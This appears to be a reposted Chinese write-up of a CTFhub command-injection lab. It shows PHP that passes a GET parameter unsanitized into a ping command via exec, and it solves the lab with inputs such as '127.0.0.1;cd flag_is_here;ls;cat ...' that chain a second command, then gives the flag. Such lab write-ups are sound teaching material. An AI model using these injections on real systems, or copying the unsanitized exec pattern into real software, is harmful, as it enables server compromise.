CTFhub-RCE-过滤目录分隔符 /

CTFhub-RCE-过滤目录分隔符 /

news2024/11/18 3:35:29

根据源代码信息可知，过滤掉了/

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

1. 查看当前目录 127.00.1;ls

2.

127.0.0.1;cd flag_is_here;ls;cat flag_21082715328454.php

ctfhub{32fc4a6e5efacbcfc917e014}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1222270.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

代码执行相关函数以及简单例题

代码执行相关函数以及简单例题

代码/命令执行系列相关函数 （代码注入）

阅读更多...

【开源】基于Vue和SpringBoot的民宿预定管理系统

【开源】基于Vue和SpringBoot的民宿预定管理系统

项目编号： S 058 ，文末获取源码。 \color{red}{项目编号：S058，文末获取源码。} 项目编号：S058，文末获取源码。目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块2.1 用例设计2.2 功能设计2.2.1 租客角色…

阅读更多...

什么是 802.1X？它是如何工作的？

什么是 802.1X？它是如何工作的？

什么是 802.1X？它是如何工作的？ 什么是IEEE 802.1X？802.1X是如何工作的？802.1X EAP安全是什么？802.1X用在哪里？IEEE 802.1X和Wi-Fi是否相同？什么是有线802.1X？ 802.1X的安全性有多高…

阅读更多...

（论文阅读）TiDB：一款基于Raft的HTAP数据库

（论文阅读）TiDB：一款基于Raft的HTAP数据库

引言混合事务分析处理（HTAP）数据库要求隔离处理事务查询和分析查询，以消除它们之间的干扰。要实现这一点，有必要维护为这两种查询类型指定的数据的不同副本。然而，为存储系统中的分布式副本提供一致的视图是一项挑战…

阅读更多...

滚雪球学Java(09-3)：Java中的逻辑运算符，你真的掌握了吗？

滚雪球学Java(09-3)：Java中的逻辑运算符，你真的掌握了吗？

咦咦咦，各位小可爱，我是你们的好伙伴——bug菌，今天又来给大家普及Java SE相关知识点了，别躲起来啊，听我讲干货还不快点赞，赞多了我就有动力讲得更嗨啦！所以呀，养成先点赞后阅读的好…

阅读更多...

7.docker运行redis容器

7.docker运行redis容器

1.准备redis的配置文件从上一篇运行MySQL容器我们知道，需要给容器挂载数据卷，来持久化数据和配置，相应的redis也不例外。这里我们以redis6.0.8为例来实际说明下。 1.1 查找redis的配置文件redis.conf 下面这个网址有各种版本的配置文件供…

阅读更多...

Android Studio Error “Unsupported class file major version 61“---异常信息记录

Android Studio Error “Unsupported class file major version 61“---异常信息记录

编译时异常信息原因及解决办法问题出在JAVA 17上，并且使用的Gradle JDK是：Android Studio java home版本17.0.1将其更改为：Android Studio默认JDK版本11.0.10 即可解决操作步骤 1 2 3

阅读更多...

基于STC12C5A60S2系列1T 8051单片的IIC总线器件模数芯片PCF8591实现模数转换应用

基于STC12C5A60S2系列1T 8051单片的IIC总线器件模数芯片PCF8591实现模数转换应用

基于STC12C5A60S2系列1T 8051单片的IIC总线器件模数芯片PCF8591实现模数转换应用 STC12C5A60S2系列1T 8051单片机管脚图STC12C5A60S2系列1T 8051单片机I/O口各种不同工作模式及配置STC12C5A60S2系列1T 8051单片机I/O口各种不同工作模式介绍IIC总线器件模数芯片PCF8591介绍通过I…

阅读更多...

RT-Thread STM32F407 PWM

RT-Thread STM32F407 PWM

为了展示PWM效果，这里用ADC来采集PWM输出通道的电平变化第一步，进入RT-Thread Settings配置PWM驱动第二步，进入board.h，打开PWM宏第三步，进入STM32CubeMX，配置时钟及PWM 第四步，回到R…

阅读更多...

免费开源的区域屏幕录制（gif转换）工具（支持编辑功能）

免费开源的区域屏幕录制（gif转换）工具（支持编辑功能）

软件优点：区域截屏，直接转换为gif即刻分享，免费开源，支持编辑功能它可以让你轻松地录制屏幕，摄像头或画板的动画，并编辑、保存为 GIF，视频或其他格式。下载并安装 ScreenToGif 首先&#xf…

阅读更多...

CentOS挂载：解锁文件系统的力量

CentOS挂载：解锁文件系统的力量

目录引言1 挂载简介2 挂载本地分区3 挂载网络共享文件系统4 使用CIFS挂载结论引言在CentOS（一种基于Linux的操作系统）上挂载文件系统是一项常见而重要的任务，无论是将新的磁盘驱动器添加到系统，还是挂载网络共享资源&#xff…

阅读更多...

C#检查服务状态，以及进行服务启停

C#检查服务状态，以及进行服务启停

1. linux环境 linux环境通过执行bash命令直接执行： public string RunCmdLinux(string cmd){var proc new Process();System.Console.Write($"Run Linux cmd > [{cmd}] START!");proc.StartInfo.CreateNoWindow true;proc.StartInfo.FileName &…

阅读更多...

【如何学习Python自动化测试】—— 自动化测试环境搭建

【如何学习Python自动化测试】—— 自动化测试环境搭建

1、自动化测试环境搭建 1.1 为什么选择 Python 什么是python，引用python官方的说法就是“一种解释型的、面向对象、带有励志语义的高级程序设计语言”，对于很多测试人员来说，这段话包含了很多术语，而测试人员大多是希望利用编程…

阅读更多...

机器学习：十大算法快速回顾

机器学习：十大算法快速回顾

一、说明对于机器学习的是个经典算法，本篇将展示一个回顾，注意，本篇不是具体原理信息介绍，没有代码，但是对于初学者是一个有益的导读。二. 线性回归 2.1 算法描述有没有想过数据奇才如何预测未来？输入线…

阅读更多...

【spring】ApplicationContext的实现

【spring】ApplicationContext的实现

目录一、ClassPathXmlApplicationContext1.1 说明1.2 代码示例1.3 截图示例二、FileSystemXmlApplicationContext2.1 说明2.2 代码示例2.3 加载xml的bean定义示例三、AnnotationConfigApplicationContext3.1 说明3.2 代码示例3.3 截图示例四、AnnotationConfigServletWebSe…

阅读更多...

40 _ 初识动态规划：如何巧妙解决“双十一”购物时的凑单问题？

40 _ 初识动态规划：如何巧妙解决“双十一”购物时的凑单问题？

淘宝的“双十一”购物节有各种促销活动，比如“满200元减50元”。假设你女朋友的购物车中有n个（n>100）想买的商品，她希望从里面选几个，在凑够满减条件的前提下，让选出来的商品价格总和最大程度地接近满减条件（200元），这样就可以极大限度地“薅羊毛”。作为程序员的你…

阅读更多...

【汇编】栈及栈操作的实现

【汇编】栈及栈操作的实现

文章目录前言一、栈是什么？二、栈的特点三、栈操作四、8086cpu操作栈4.1 汇编指令4.2 汇编代码讲解问题：回答： 4.3 栈的操作4.3 push 指令和pop指令的执行过程执行入栈(push)时，栈顶超出栈空间执行出栈(pop)时，栈顶超…

阅读更多...

Bert浅谈

Bert浅谈

优点首先，bert的创新点在于利用了双向transformer，这就跟openai的gpt有区别，gpt是采用单向的transformer，而作者认为双向transformer更能够融合上下文的信息。这里双向和单向的区别在于，单向只跟当前位置之前的tocke…

阅读更多...

【小收获】数组在声明时整体赋值的细节

【小收获】数组在声明时整体赋值的细节

在C中，在全局区声明的数组会自动初始化如果没有为全局区的整数类型的数组指定初始值，那么它的元素都会被自动初始化为0。该特性适用于所有整数类型的数组，包括char、short、int、long等。（注:char类型数组自动初始化为0&#xff…

阅读更多...

CCF ChinaSoft 2023 论坛巡礼 | CCF-华为胡杨林基金-软件工程专项（海报）论坛

CCF ChinaSoft 2023 论坛巡礼 | CCF-华为胡杨林基金-软件工程专项（海报）论坛

2023年CCF中国软件大会（CCF ChinaSoft 2023）由CCF主办，CCF系统软件专委会、形式化方法专委会、软件工程专委会以及复旦大学联合承办，将于2023年12月1-3日在上海国际会议中心举行。本次大会主题是“智能化软件创新推动数字经济与社…

阅读更多...

推荐文章

最新文章